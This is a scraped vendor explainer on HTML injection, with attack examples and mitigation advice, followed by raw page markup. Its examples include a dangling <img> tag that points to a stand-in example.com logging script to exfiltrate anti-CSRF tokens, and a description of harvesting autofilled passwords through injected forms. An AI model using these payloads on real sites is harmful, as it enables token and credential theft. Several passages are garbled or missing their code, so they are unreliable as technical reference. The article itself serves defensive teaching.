What Is HTML Injection? Mitigation and Prevention

HTML Injection - What is it?

This attack is a leading type of cyber vulnerability taking advantage of weak website components. Most of the web pages that we see today are created using HTML or Hypertext Markup Language and it decides how any of the web data will display to the users as they access a specific web page in the browser. Using the visualization commands of the web page, the language helps website developers decide how a web page will look in real time.

Presently, the webpages websites use are highly interactive and it’s often considered that the previous user actions impact the webpage content.

In case of unverified user inputs, the web pages or applications will be vulnerable to an attack.

Skilled hackers take advantage of this loophole and use inject HTML injections in those web pages. In this attack, bad actors fabricate inputs using which they successfully insert an HTML code into the user-generated response of an HTML-based application.

‍

How Does HTML Injection Work?

Functionality-wise, HTML injection looks very similar to XSS attacks as they both follow the same delivery path The attack takes place when an ill-intended user or hacker inserts an HTML code in the unverified input and prompts the browser to consider it as an integral part of HTML language of the targeted webpage.

The prime target of this attack is the user. Web server is not a concern for HTML injection.

Speaking of the intent, HTML injection is planned mainly because of two goals:

To modify the website appearance so that the website’s reputation is tarnished
To snatch the identity of someone authorized

The attack is executed using the links and data input fields of the targeted website.

To bring this attack into action, hackers start identifying the weak HTML codes of websites and inserting an HTML injection. Mainly, website components like comments, search bars, and contact forms are used to insert HTML injection as these elements are used by a large crowd and are less likely to be of top-notch quality.

For instance, hackers can post an engaging comment and insert HTML code snippets that will redirect the commenters to a corrupted web page or will prompt them to download malware. Let’s explain the functionality of this attack with the help of a questionnaire form that most websites have to let their users properly forward their concerns and queries.

As a user fills out these questionnaire forms on any of the websites, details like concerns, name, email address, and phone numbers are shared. Upon submission of this form, an acknowledgment message is shared instantly. To users, this acknowledgment message will look like this:

The corresponding code for this message will be:

As the code is easy to edit and is highly vulnerable, hackers will have the hassle of inserting an HTML injection in the code.

HTML Injection Work

Consequences of the Attack

When successful, an HTML injection attack can lead to multiple security concerns that include:

XSS attacks: HTML injection is one of the many techniques that threat actors use to plan an XSS attack on a set of users. With this, hackers can gain access to key information like user credentials and purchase passwords and use them to take harmful actions like extracting money from the bank account or stealing the passwords of important accounts.

Website defacement: Hackers use HTML injection to defame websites as they can modify the webpage content with this method. Threat actors can make the webpage display offensive content or even can make a website completely unusable.

Dispersal of malware: Hackers often use HTML injection or code injection techniques to distribute malware or viruses to the masses.

Loss of trust: When a website is unresponsive or displays inappropriate content, users won't feel comfortable accessing such a website. Hence, there will be a huge drop in user -engagement.

‍

Types of HTML Injection

There are two HTML injection varieties that hackers use to plan an attack.

Stored

The second HTML injection type is stored HTML injection and it involves storing the payload on the servers for future use. HTML codes are generated in bulk and stored on the server so that hackers can access them whenever they want. Hackers use this variety when they have to target multiple users in one go.

Reflected

This method is the commonly used variety and it involves delivery of payload or HTML code to every target specifically. There is no bulk delivery. Hence, it may consume more time. But, it has a high success rate as the code is embedded into the webpage with more perfection.

Based on the HTTP method used, reflected HTML injection is further divided into three categories: reflected GET, reflected POST, and reflected URL. Reflected URL refers to the injection delivery via the URL of a website.

In the reflected GET injection type, data is requested while reflected request POST means data is delivered. Haceks often check the webpage source to learn which method is suitable for which website element.

For instance, threat actors inspect the login form’s source code to find out the appropriate injection method.

‍

HTML Injection Example

Based on the purpose and intention of the attack, hackers can use multiple types of HTMLinjection payloads. Here are the examples of most commonly used HTML injection techniques.

Exfiltrating sensitive user data

Accessing crucial information of specific users is another very common use case of this attack. Hackers introduce HTML injection payloads to a website form that is created to collect data like user name, email, and contact details.

Contact forms, questionnaires, and comments are some of the many examples of these types of forms. Hackers use these forms to plan an HTML injection attack as they enter a corrupted code in this form to prompt counterfeit login.

In the case of a URL-based webpage, hackers use tag to acquire sensitive data.

to hijack data. href='http://example.com/'> is the code that bad actors use to insert the respective URL of the webpage.

In addition to this, hackers also acquire fully validated HTML forms by inserting the

tag before a verified tag.

Exfiltrating anti-CSRF tokens

If hackers are planning an elaborated CSRF attack then they use HTML injection payloads to exfiltrate the anti-CSRF token that is delivered using the hidden input of a form.

Hackers need a non-terminated tag to exfiltrate the token. For the success of this action, the tag must be featuring single quotes like <img src='http://example.com/record.php?.

It’s because of the single quote that the remaining content of the quote will be considered as the URL part. If double quotes are there, the hidden input will be forwarded to the threat actors in a highly controlled record.php script and will be recorded as:

Alternatively, cyberpunks can use </em> tag to exfilter the CSRF token. When this stage is used, the content after <em>the <textarea></em> tag will only be submitted as the input and <em><textarea></em> and <em><form></em> tags will be closed.</p> <p>However, hackers need to ensure that users are submitting the forms manually.</p> <ol start="3"> <li><strong>Defacing</strong></li> </ol> <p>Perhaps the most austere example of this attack is defacing which simply means changing the actual appearance of a website by modifying certain visual components.</p> <p>For instance, hackers can insert HTML injections in the video ads that a business is marketing across the channels.</p> <p>Defacing is mainly done to harm the brand reputation of a business’s website/page.</p> <ol start="4"> <li><strong>Exfiltrating passwords stored in the browser</strong></li> </ol> <p>Lastly, we would like to inform you that HTML injections are widely used to extract the auto-filled passwords that a webpage is storing. Hackers need to create a compatible form for this. As the form is created, the password manager will supply the auto-saved passwords in no time.</p> <p>‍</p> <h2>How is This Attack Different From the Others?</h2> <p>The cyber vulnerability profile is so diverse that many attacks share great similarities. For example, XSS and HTML-injection. However, no two loopholes are the same. They only share a fragment of characteristics.</p> <p>Let’s understand how different or similar an HTML injection method is to other leading attacks. When compared with XSS, SQL injection, and JavaScript injection attacks, HTML injection is less harmful. Unlike these attacks, code injection won’t cause huge harm to the database or steal mission-critical information.</p> <p>However, it’s more powerful when it comes to alerting the website's appearance and user experience. Rest attacks, which we mentioned above, are not often concerned with website appearance modification. But, HTML injection can change crucial website elements and can impact the website performance and user experience.</p> <p>As websites play a crucial role in brand building and customer reach, businesses can’t take HTML injection attacks lightly just because it possesses a minimal threat to databases.</p> <p>When it comes to data stealing, XSS and HTML injection work in a very similar fashion. Both these attacks are HTML based and aim to steal user identity information.</p> <p>‍</p> <h2>Mitigation and Prevention HTML Injection</h2> <p>No cyber risk should be taken lightly. In fact, AppSec professionals must have appropriate remedies in place to fix, prevent, and mitigate any sort of vulnerabilities ASAP. Below mentioned are some viable ways to control the spread and risks of HTML injections.</p> <ul> <li>The first and foremost HTML injection prevention principle is to validate output and inputs as the attack only targets non-verified inputs/outputs.</li> <li>Second, experts recommend inspecting every input and finding out if there is any HTML or script code mentioned in the inputs. Many tools are there to help you out in the process.</li> <li>The adoption of good security testing practices is also very viable to control the spread of these attacks. Try using automated testing tools so that no single website component is missed from being tested.</li> <li>When mitigation is concerned, using a <a href="https://www.wallarm.com/what/waf-meaning">WAF or Web Application Firewall</a> is a great technique to adopt. With WAF, website owners can stop hackers or users from modifying the input codes. This way, HTML codes can’t be a part of website inputs. The use of a CSP or Content Security Policy is also useful to mitigate this type of attack. However, you need to understand that this policy is not applicable in every use case. Hence, you need to adopt other ways as well.</li> </ul> <p>‍</p> <h2>HTML Injection Protection with Wallarm</h2> <p>Just because HTML injection has no serious threats to the databases, organizations shouldn’t overlook HTML injection and take appropriate actions to control its impact and even prevent it from happening.</p> <p>Wallarm provides a wide range of solutions that enterprises can implement in any cloud environment to control HTML injection. For instance, it provides a highly responsive <a href="https://www.wallarm.com/product/wallarm-waap">cloud-based WAAP</a> tool that can inspect every website component in real-time and prevent their modifications.</p> <p>The tool ditches outdated RegEX techniques for vulnerability detection. Hence, it has fewer false positive and false negative incidences. With one tool, enterprises can protect all sorts of <a href="https://www.wallarm.com/what/what-is-api">APIs</a>, <a href="https://www.wallarm.com/what/what-is-microservices-architecture">microservices</a>, and cloud ecosystems.</p> <p>Though Wallarm WAF is an expert choice, Wallarm provides a highly advanced WAF testing tool for those using customized WAF. <a href="https://www.wallarm.com/gotestwaf/overview">GoTestWAF</a> is a platform by Wallarm that can help organizations to check the real-time functionalities of WAF and find out if the WAF is worth a try or strong enough to provide considerable protection against HTML injection attacks.</p> <p>For accurate detection of HTML injection and the alike, you can try the <a href="https://www.wallarm.com/what/api-security-tutorial">API security</a> and testing tools that can perform code-by-code security scanning and <a href="https://docs.wallarm.com/about-wallarm/detecting-vulnerabilities/">detect any vulnerabilities</a>.</p> </div> <div class="n-padding-bottom n-padding-medium"></div> <div id="faq-whats-collection-main" class="n-faq-collection-wrapper"> <h2 class="n-heading-style-h2">FAQ</h2> <div class="n-padding-bottom n-padding-small"></div><div class="faq-collection-wrapper w-dyn-list"><div class="w-dyn-empty"> <div class="w-embed w-script"> <script> (function() { 'use strict'; const FAQ_COLLECTION_WRAPPER_ID = 'faq-collection-list'; const FAQCollectionList = document.getElementById(FAQ_COLLECTION_WRAPPER_ID); if (FAQCollectionList) { return } const FAQ_BLOCK_WRAPPER_ID = 'faq-whats-collection-main'; const CSS = `#${FAQ_BLOCK_WRAPPER_ID} { display: none }`; const style = document.createElement('style'); document.head.appendChild(style); style.appendChild(document.createTextNode(CSS)); })(); </script> </div> </div></div> </div> <div class="n-padding-bottom n-padding-medium"></div> <div id="subscribe-form" class="n-whats-subscribe-form"> <p class="n-heading-style-h5 n-z-index-2">Subscribe for the latest news</p> <div class="n-padding-bottom n-padding-small"></div> <div class="whats-subscribe-block-form-container"> <div class="html-embed-41 w-embed w-script"> <script type="text/javascript"> window.wHubspotConf = { type: "subscribe_whats", lazyLoad: true }; </script> </div> <div class="html-embed-42 n-z-index-2 w-embed w-script"> <script> (function () { window.lazyLoadScript("https://static.wallarm.com/wallarm-webflow/form-hubspot/v3/single-form-async.js"); })(); </script> <div id="hubspot-form-container" class="hbspt-form"> <style> .hbspt-form-container-empty { margin-right: 8px; } .hbspt-form-container-empty:empty { height: 150px; margin-top: 30px; background-image: linear-gradient(white 38px, transparent 0), linear-gradient(white 38px, transparent 0), linear-gradient(white 38px, transparent 0); background-repeat: repeat-y; background-size: 100% 200px, 100% 200px, 140px 200px; background-position: 0 0, 0 48px, 50% 96px; } @keyframes shine-mobile { to { background-position: 100% 0, 0 0, 0 48px, 50% 96px; } } </style> <div class="hbspt-form-container-empty"></div> </div> </div> </div><img src="/assets/images/img-hero-waap.svg" alt="" loading="lazy" width="450" class="image-246"></div> <div class="n-padding-bottom n-padding-medium"></div> <div class="n-whats-pub-date-wrapper"> <div class="n-whats-pub-date"> <div class="n-text-size-regular">Published: </div> <div itemprop="datePublished" class="n-text-size-regular">May 6, 2023</div> </div> <div class="n-text-size-regular n-hide-mobile-portrait whats-article-dates-separate">|</div> <div class="n-whats-pub-date"> <div class="n-text-size-regular">Updated:</div> <div itemprop="dateModified" class="n-text-size-regular">May 7, 2023</div> <div class="hidden w-embed w-script"> <script> (function (){ 'use strict'; const datePublishedDom = document.querySelector('[itemprop="datePublished"]'); const datePublished = datePublishedDom.innerText; const dateModifiedDom = document.querySelector('[itemprop="dateModified"]'); const dateModified = dateModifiedDom.innerText; const whatsArticleDatesSeparate = document.querySelector('.whats-article-dates-separate'); if (datePublished === dateModified) { hideNode(dateModifiedDom.parentElement); hideNode(whatsArticleDatesSeparate); } function hideNode(node) { node.style.display='none'; } })(); </script> </div> </div> </div> </div> <div id="w-node-_650b3ffb-1120-5846-6059-ce22e752f9f0-4d861332" class="whats-article-template-right"> <div class="whats-article-webinar-wrapper"><div class="w-dyn-list"><div role="list" class="w-dyn-items"><div role="listitem" class="w-dyn-item"> <a href="/webinars/ciso-top-10-trends-for-2024/" class="div-block-57 bottom-huge webinars vert_whats what-template-on-demand-webinar-wrapper w-inline-block"> <div id="w-node-_4cedd0d2-db1e-62cd-34d2-65b3bdef732a-bdef7326" class="div-block-118 webinars vert_what what-template-on-demand-webinar-itm1"> <div class="div-block-117 webinar vert_what what-template-on-demand-webinar-itm1-child"><picture loading="lazy" height="275" width="310" title="AWS with Wallarm" class="image-39 webinars vert_what"> <source type="image/webp" srcset="/assets/images/hOkL240ysC-800.webp 800w, /assets/images/hOkL240ysC-1080.webp 1080w" sizes="100vw"> <source type="image/png" srcset="/assets/images/hOkL240ysC-800.png 800w, /assets/images/hOkL240ysC-1080.png 1080w" sizes="100vw"> <img src="/assets/images/hOkL240ysC-800.png" alt="" loading="lazy" height="275" width="310" title="AWS with Wallarm" class="image-39 webinars vert_what" decoding="async"> </picture></div> </div> <div class="div-block-58 vert_what what-template-on-demand-webinar-itm2"> <div> <div class="div-block-132 vert_what"> <div class="badge">webinar</div> <div class="webinar-date vert_what">December 12, 2023</div> </div> </div> <div class="card-title without-mobile-fonts bottom-tiny">CISO Top 10 Trends for 2024</div> <p class="hero-description mini left vert_what">Register now to unlock the key trends that will define cybersecurity in 2024 and beyond. </p> <div class="div-block-128"> <div class="read-button vert-what">Sign up</div> </div> </div> </a> </div></div></div> </div> <div class="n-learning-objectives-wrapper"> <div class="n-text-size-large n-text-weight-bold">Learning Objectives</div> <div class="n-padding-bottom n-padding-small"></div> <div class="learning-objectives"> <div class="w-embed"> <div> <style> .learning-objectives-wrapper-empty:empty { height: 150px; margin-top: 30px; background-image: linear-gradient( 100deg, rgba(255, 255, 255, 0), rgba(255, 255, 255, 0.5) 50%, rgba(255, 255, 255, 0) 80% ), linear-gradient( white 18px, transparent 0 ), linear-gradient( white 18px, transparent 0 ), linear-gradient( white 18px, transparent 0 ), linear-gradient( white 18px, transparent 0 ), linear-gradient( white 18px, transparent 0 ), linear-gradient( white 18px, transparent 0 ), linear-gradient( white 18px, transparent 0 ); background-repeat: repeat-y; background-size: 50px 150px, 100% 200px, 70% 200px, 70% 200px, 100% 200px, 70% 200px; background-position: 0 0, 0 0, 0 28px, 0 56px, 0 94px, 0 122px; animation: shine-desktop 1s infinite; } @keyframes shine-desktop { to { background-position: 100% 0, 0 0, 0 28px, 0 56px, 0 94px, 0 122px; } } </style> <div class="learning-objectives-wrapper-empty"></div> </div> </div> </div> </div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-subscribe-right-side-form-wrapper"> <div class="div-block-245"> <div class="n-text-size-large n-text-weight-bold without-mobile-fonts n-z-index-2">Subscribe for <br>the latest news</div> <div class="n-padding-bottom n-padding-small"></div> </div> <div class="hidden w-embed"> <style> .subscribe-form-wrapper.whats { background-image: url("https://assets.website-files.com/5fe3434623c64c793987363d/624ea38c9502d54ec75bf33d_graphic.svg"); background-position: top -71px right -71px; background-size: 140px 140px; background-repeat: no-repeat; } </style> </div> <a href="#subscribe-form" class="n-button n-z-index-2 w-button">subscribe</a><img src="/assets/images/img-hero-deployment-svg.svg" alt="" loading="lazy" width="450" class="n-subsribe-form-small-image"></div> <div class="n-padding-bottom n-padding-small"></div><a itemscope="true" itemprop="author" itemtype="http://schema.org/Person" href="https://www.linkedin.com/in/mukhadin-b-ab401723b/" class="n-whats-author-wrapper w-inline-block"> <div itemprop="url" class="whats-article-author-link"> <div><picture loading="lazy" class="n-author-image"> <source type="image/webp" srcset="/assets/images/OZIfH35KfR-400.webp 400w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/OZIfH35KfR-400.jpeg 400w" sizes="100vw"> <img src="/assets/images/OZIfH35KfR-400.jpeg" alt="" loading="lazy" class="n-author-image" decoding="async"> </picture><div class="n-padding-bottom n-padding-small"></div> <div><div itemprop="name" class="n-author-card-label">Mukhadin Beschokov</div> <div class="n-author-verified-label"><img src="/assets/images/author-verified-icon.svg" alt="" loading="lazy" class="whats-author-verified-icon whats-article-author-verified-icon"><div class="n-text-size-small">Verified Expert</div> </div> </div> </div> <div class="n-padding-bottom n-padding-small"></div><div class="n-text-size-small n-text-color-black">20+ years IT expertise in system engineering, security analysis, solutions architecture. Proficient in OS (Windows, Linux, Unix), programming (C++, Python, HTML/CSS/JS, Bash), DB (MySQL, Oracle, MongoDB, PostgreSQL). Skilled in scripting (PowerShell, Python), DevOps (microservices, containers, CI/CD), web development (Node.js, React, Angular). Successful track record in managing IT systems.</div> </div> </a> </div> </div> <div class="learning-objectives-script w-embed w-script"> <script> (function() { "use strict"; const linearArr = [ ...getHeadersInPage(), ...getFAQInPage() ]; setHeaderIdAttr(linearArr); const threeArr = linearToThree(linearArr); const node = threeToDom(threeArr); insertNavigation(node); function getHeadersInPage() { try { return document.querySelectorAll('.whats-rich-text-block h1, .whats-rich-text-block h2'); } catch (error) {} return []; } function getFAQInPage() { const isEmpty = document.querySelector('#faq-whats-collection-main .w-dyn-empty'); if (isEmpty) { return []; } try { return document.querySelectorAll('#faq-whats-collection-main .n-heading-style-h2'); } catch (e) {} return []; } function setHeaderIdAttr(linearArr) { let i=0; while (i<linearArr.length) { if (!linearArr[i].getAttribute('id')) { const innerText = linearArr[i].innerText; const hashFromInnerText = getHash(innerText); linearArr[i].setAttribute('id', hashFromInnerText); } i++; } } function getHash(text = '') { return text.toLowerCase().replace(/[^a-zA-Z0-9]/g,'_'); } function linearToThree(linearArr) { if (!linearArr.length) { return []; } const [firstTag, ...othersTag] = linearArr; const indexes = [0]; let i = 0; while (i < othersTag.length) { if (firstTag.tagName === othersTag[i].tagName) { indexes.push(i+1); } i++; } let j = 0; const three = []; while (j<indexes.length) { let sub; if (indexes[j+1]) { sub = Array.prototype.slice.call(linearArr, indexes[j] + 1, indexes[j+1]); } else { sub = Array.prototype.slice.call(linearArr, indexes[j] + 1); } three.push({ tagInnerText: linearArr[indexes[j]].innerText, tagId: linearArr[indexes[j]].getAttribute('id'), sub: linearToThree(sub) }); j++; } return three; } function threeToDom(t) { if (!t.length) { return; } let resultDom = createUlTag(); let i=0; while (i<t.length) { const liElement = createLiTag(); const { sub, tagInnerText, tagId } = t[i]; const headerTag = createLinkTag(tagInnerText, tagId); const subList = threeToDom(sub); liElement.appendChild(headerTag); if (subList) { liElement.appendChild(subList); } resultDom.appendChild(liElement); i++; } return resultDom; } function createUlTag() { return document.createElement('ul'); } function createLiTag() { return document.createElement('li'); } function createLinkTag(tagInnerText, tagId) { const linkElement = document.createElement('a'); linkElement.innerText = tagInnerText; linkElement.setAttribute('href', `#${tagId}`); return linkElement; } function insertNavigation(node) { const blocks = document.querySelectorAll(".learning-objectives"); blocks.forEach(block => { const listNode = node.cloneNode(true); block.innerHTML = ""; block.appendChild(listNode); }); } })(); </script> <style> #learning-objectives > ul { list-style-type:decimal; } #learning-objectives > ul > li ul { list-style-type: disc; } #learning-objectives ul { padding-left: 20px; } #learning-objectives > ul > li, #learning-objectives > ul > li ul { margin: 10px 0; } #learning-objectives > ul > li > a { font-weight: bold; } #learning-objectives > ul > li > ul > li > ul { display: none; } </style> </div> </div> </div> </div> </div> <div class="n-section n-overflow-visible"> <div class="n-padding-global n-pos-static"> <div class="n-container-large n-pos-static"> <div class="n-padding-section-medium"> <div> <div> <div class="n-heading-style-h2 without-mobile-fonts">Related Topics</div> <div class="n-padding-bottom n-padding-medium"></div> </div> <div class="div-block-196"> <div class="learning-objectives-wrapper related-topics related-topics-mobile test whats-related-topics-list-container"><div class="collection-list-wrapper-2 whats-related-topics-list-wrapper w-dyn-list"><div id="related-topics-block" role="list" class="n-scrollable-articles-wrapper w-dyn-items"><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/path-traversal-attack/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/MSrgFLceu4-800.webp 800w, /assets/images/MSrgFLceu4-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/MSrgFLceu4-800.jpeg 800w, /assets/images/MSrgFLceu4-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/MSrgFLceu4-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">Path Traversal Attack</div> <p class="n-text-size-regular"> In this guide, we will learn what path traversal vulnerability 🔄 is and the definition of a path traversal attack.</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/cryptocurrency-security-full-guide-by-wallarm/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/NzjG1pQZDA-800.webp 800w, /assets/images/NzjG1pQZDA-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/NzjG1pQZDA-800.jpeg 800w, /assets/images/NzjG1pQZDA-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/NzjG1pQZDA-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Ivan Lee</div> <div>|</div> <div>January 26, 2023</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">Cryptocurrency Security. Full Guide by Wallarm</div> <p class="n-text-size-regular">Cryptocurrency is booming, but is it secure? This guide explores the risks and how to keep your crypto assets safe from hackers and cyber attacks. 💻</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-hulk-http-unbearable-load-king/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/y7_SCmHeTz-800.webp 800w, /assets/images/y7_SCmHeTz-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/y7_SCmHeTz-800.jpeg 800w, /assets/images/y7_SCmHeTz-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/y7_SCmHeTz-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>October 18, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is HULK - HTTP Unbearable Load King?</div> <p class="n-text-size-regular">HULK is an abbreviation for HTTP Unbearable Load King, which is a web server Distributed Denial of Service tool. It is mainly designed for research purpose ⚙️</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-the-difference-between-csrf-and-xss/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/5ke46ow0Eo-800.webp 800w, /assets/images/5ke46ow0Eo-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/5ke46ow0Eo-800.jpeg 800w, /assets/images/5ke46ow0Eo-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/5ke46ow0Eo-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>September 20, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is the difference between CSRF and XSS?</div> <p class="n-text-size-regular">CSRF and XSS are two such client-side attacks. They both are nefarious and have serious outcomes. Let’s unearth the truth behind the CSRF v/s XSS attack. ⚔️</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-privilege-escalation-attack/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/8WOVlt0U2b-800.webp 800w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/8WOVlt0U2b-800.jpeg 800w" sizes="100vw"> <img src="/assets/images/8WOVlt0U2b-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Ivan Lee</div> <div>|</div> <div>September 20, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is Privilege Escalation Attack?</div> <p class="n-text-size-regular">Privilege escalation is normally not the aggressor's ultimate objective, 🕵️‍♂️ it is much of the time utilized as a component of the arrangement cycle for a more engaged cyberattack</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-a-beast-attack/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/bUli2A7HvI-800.webp 800w, /assets/images/bUli2A7HvI-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/bUli2A7HvI-800.jpeg 800w, /assets/images/bUli2A7HvI-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/bUli2A7HvI-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>September 20, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is a BEAST Attack? Vulnerability of TLS/SSL protocols</div> <p class="n-text-size-regular">Browser Exploit Against SSL/TLS is alluded to as BEAST. ⚙️ It is an organization weakness assault against TLS 1.0 and prior SSL versions.</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/poodle-attack/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/cuEd5mCVOt-800.webp 800w, /assets/images/cuEd5mCVOt-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/cuEd5mCVOt-800.jpeg 800w, /assets/images/cuEd5mCVOt-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/cuEd5mCVOt-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>September 12, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">POODLE Attack</div> <p class="n-text-size-regular">The SSL 3.0 protocol is defenseless against the POODLE attack (CVE-2014-3566). This blemish empowers an assailant to catch SSLv3-scrambled traffic. ⚙️</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-magecart-attack-how-to-prevent-it/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/NyJIjntsU8-800.webp 800w, /assets/images/NyJIjntsU8-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/NyJIjntsU8-800.jpeg 800w, /assets/images/NyJIjntsU8-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/NyJIjntsU8-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Ivan Lee</div> <div>|</div> <div>September 7, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks, Vulnerabilities</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is Magecart Attack? ⚔️ How to prevent it?</div> <p class="n-text-size-regular">Magecart hacker group have reportedly performed malicious activities from 2016. They frequently only focus on online shopping cart 🛒 systems, one of which is the Magento platform</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/spyware-what-is-it/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/a_l5fGHAnS-800.webp 800w, /assets/images/a_l5fGHAnS-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/a_l5fGHAnS-800.jpeg 800w, /assets/images/a_l5fGHAnS-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/a_l5fGHAnS-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>August 24, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">Spyware - What is it and how to protect yourself from it?</div> <p class="n-text-size-regular">Spyware is a hurtful type of software that covertly gets private data determined to hurt you or your business. In this article, we will talk about it in detail. 🔍</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-wardriving-complete-guide/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/lVgW-e_pIP-800.webp 800w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/lVgW-e_pIP-800.jpeg 800w" sizes="100vw"> <img src="/assets/images/lVgW-e_pIP-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div class="n-resource-meta-wrapper"><div>Mukhadin Beschokov</div> <div>|</div> <div>August 22, 2022</div> </div><div class="n-text-size-small-all-caps">Attacks</div> <div class="n-padding-bottom n-padding-small"></div> <div class="n-text-size-regular n-text-weight-bold">What is WarDriving? [Complete Guide]</div> <p class="n-text-size-regular">Wardriving is something that will interest you. Known for one movie, this practice of using WiFi connections ⚙️ is both a boon and a disaster. Get answers to all your questions about Wardriving</p> </div> </a> </div><div role="listitem" class="collection-item-11 w-dyn-item"> <a href="/what/what-is-data-exfiltration/" class="n-resource-card w-inline-block"> <div class="n-resource-image"><picture height="" loading="lazy"> <source type="image/webp" srcset="/assets/images/Ksjh6Ts4Kd-800.webp 800w, /assets/images/Ksjh6Ts4Kd-1080.webp 1080w" sizes="100vw"> <source type="image/jpeg" srcset="/assets/images/Ksjh6Ts4Kd-800.jpeg 800w, /assets/images/Ksjh6Ts4Kd-1080.jpeg 1080w" sizes="100vw"> <img src="/assets/images/Ksjh6Ts4Kd-800.jpeg" alt="" height="" loading="lazy" decoding="async"> </picture></div> <div class="n-resource-text-wrapper"><div 